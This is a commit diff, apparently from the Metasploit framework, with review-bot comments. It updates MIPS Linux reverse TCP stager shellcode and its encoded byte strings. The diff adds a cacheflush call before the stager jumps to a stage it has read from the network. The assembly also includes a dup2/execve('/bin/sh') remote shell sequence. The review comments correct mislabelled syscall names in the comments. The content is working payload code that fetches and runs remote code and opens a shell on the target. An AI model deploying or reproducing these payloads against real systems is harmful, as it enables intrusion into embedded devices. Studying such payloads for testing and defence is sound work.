Fluch data cache and improve documentation

bug/bundler_fix
jvazquez-r7 2014-01-14 14:06:01 -06:00
parent a8806887e9
commit a056d937e7
5 changed files with 41 additions and 3 deletions


@ -41,6 +41,7 @@ main:
# dup2(sockfd, 0) # dup2(sockfd, 0)
# a0: oldfd (sockfd) # a0: oldfd (sockfd)
# a1: newfd (2, 1, 0) # a1: newfd (2, 1, 0)
# v0: syscall = __NR_dup2 (4063)
li $s1, -3 li $s1, -3
nor $s1, $s1, $zero nor $s1, $s1, $zero
add $a0, $s2, $zero add $a0, $s2, $zero
@ -50,12 +51,13 @@ dup2_loop:
syscall 0x40404 syscall 0x40404
li $s0, -1 li $s0, -1
addi $s1, $s1, -1 addi $s1, $s1, -1
bne $s1, $s0, dup2_loop # <dup2_loop> bne $s1, $s0, dup2_loop # <dup2_loop>
# execve("/bin/sh", ["/bin/sh"], NULL) # execve("/bin/sh", ["/bin/sh"], NULL)
# a0: filename "/bin/sh" # a0: filename "/bin/sh"
# a1: argv ["/bin/sh", NULL] # a1: argv ["/bin/sh", NULL]
# a2: envp NULL # a2: envp NULL
# v0: syscall = __NR_dup2 (4011)
li $t8, -1 # load t8 with -1 li $t8, -1 # load t8 with -1
getaddr: # getaddr trick from scut@team-teso.net getaddr: # getaddr trick from scut@team-teso.net
bltzal $t8, getaddr # branch with $ra stored if t8 < 0 bltzal $t8, getaddr # branch with $ra stored if t8 < 0
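Review bot: The comment added before the execve sequence mislabels the syscall: `# v0: syscall = __NR_dup2 (4011)` gives execve's number with dup2's name, and should read `# v0: syscall = __NR_execve (4011)`. The matching line added in the dup2 block, `# v0: syscall = __NR_dup2 (4063)`, is consistent with the number it documents. The `li $v0` that actually loads the execve number lies outside the hunk, so the value 4011 cannot be cross-checked here; `main` also starts and ends outside the hunk.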


@ -13,7 +13,7 @@
# #
# Description: # Description:
# #
# Implementation of a MIPS LE Linux reverse TCP stager. # Implementation of a MIPS BE Linux reverse TCP stager.
# #
# File descriptor in $s2. # File descriptor in $s2.
# #
@ -53,6 +53,7 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr = AF_INET (2) # a1: addr = AF_INET (2)
# a2: addrlen = 16 # a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp) lw $a0, -4($sp)
li $t7, -3 li $t7, -3
nor $t7, $t7, $zero nor $t7, $t7, $zero
@ -75,6 +76,7 @@ main:
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1 # sp(16): fd = -1
# sp(20): offset = 0 # sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1 li $a0, -1
li $a1, 4097 li $a1, 4097
addi $a1, $a1, -1 addi $a1, $a1, -1
@ -95,12 +97,26 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr # a1: addr
# a2: len = 4096 # a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp) lw $a0, -4($sp)
lw $a1, -8($sp) lw $a1, -8($sp)
li $a2, 4097 li $a2, 4097
addi $a2, $a2, -1 addi $a2, $a2, -1
li $v0, 4003 li $v0, 4003
syscall 0x40404 syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage # jmp to the stage
lw $s1, -8($sp) lw $s1, -8($sp)
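Review bot: The new cacheflush block's syscall comment carries the wrong name: `# v0: syscall = __NR_read (4147)` should be `# v0: syscall = __NR_cacheflush (4147)`, since 4147 is what the following `li $v0, 4147` loads and the block header documents cacheflush(addr, nbytes, DCACHE). The identical copy-paste appears in the cacheflush block of the next file section. A smaller point: `add $a1, $v0, $zero` reuses read's return value as nbytes with no check, so a failed read would hand a negative length to cacheflush; that matches the unchecked style of the rest of the stager, but a comment such as `# a1 = bytes actually read (read's return reused, unchecked)` would make the dependency explicit. The enclosing `main` starts and ends outside the hunk.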


@ -53,6 +53,7 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr = AF_INET (2) # a1: addr = AF_INET (2)
# a2: addrlen = 16 # a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp) lw $a0, -4($sp)
li $t7, -3 li $t7, -3
nor $t7, $t7, $zero nor $t7, $t7, $zero
@ -75,6 +76,7 @@ main:
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1 # sp(16): fd = -1
# sp(20): offset = 0 # sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1 li $a0, -1
li $a1, 4097 li $a1, 4097
addi $a1, $a1, -1 addi $a1, $a1, -1
@ -95,16 +97,30 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr # a1: addr
# a2: len = 4096 # a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp) lw $a0, -4($sp)
lw $a1, -8($sp) lw $a1, -8($sp)
li $a2, 4097 li $a2, 4097
addi $a2, $a2, -1 addi $a2, $a2, -1
li $v0, 4003 li $v0, 4003
syscall 0x40404 syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage # jmp to the stage
lw $s1, -8($sp) lw $s1, -8($sp)
lw $s2, -4($sp) lw $s2, -4($sp) # sockfd saved on $s2
jalr $s1 jalr $s1
.set macro .set macro


@ -45,6 +45,8 @@ module Metasploit3
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" + "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" + "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" + "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" + "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
"\xf8\x09" "\xf8\x09"
} }
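Review bot: The two string lines added between the read and jalr bytes carry no indication of what they encode, so a maintainer cannot match them back to the assembly source without disassembling them. Decoded as big-endian MIPS words they are `lw $a0,-8($sp); add $a1,$v0,$zero; li $t1,-3; nor $t1,$t1,$zero; add $a2,$t1,$zero; li $v0,4147; syscall`, i.e. the cacheflush(addr, nbytes, DCACHE) call this commit adds to the assembly. A trailing comment on the first added line, `# cacheflush(addr, nbytes, DCACHE) -- keep in sync with the assembly source`, would tie the two together; the little-endian variant in the next file section holds the same words byte-swapped and would benefit from the same comment. The payload string and `module Metasploit3` start and end outside the hunk.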


@ -45,6 +45,8 @@ module Metasploit3
"\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" + "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" + "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
"\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" + "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
"\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" + "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
"\x20\x02" "\x20\x02"
} }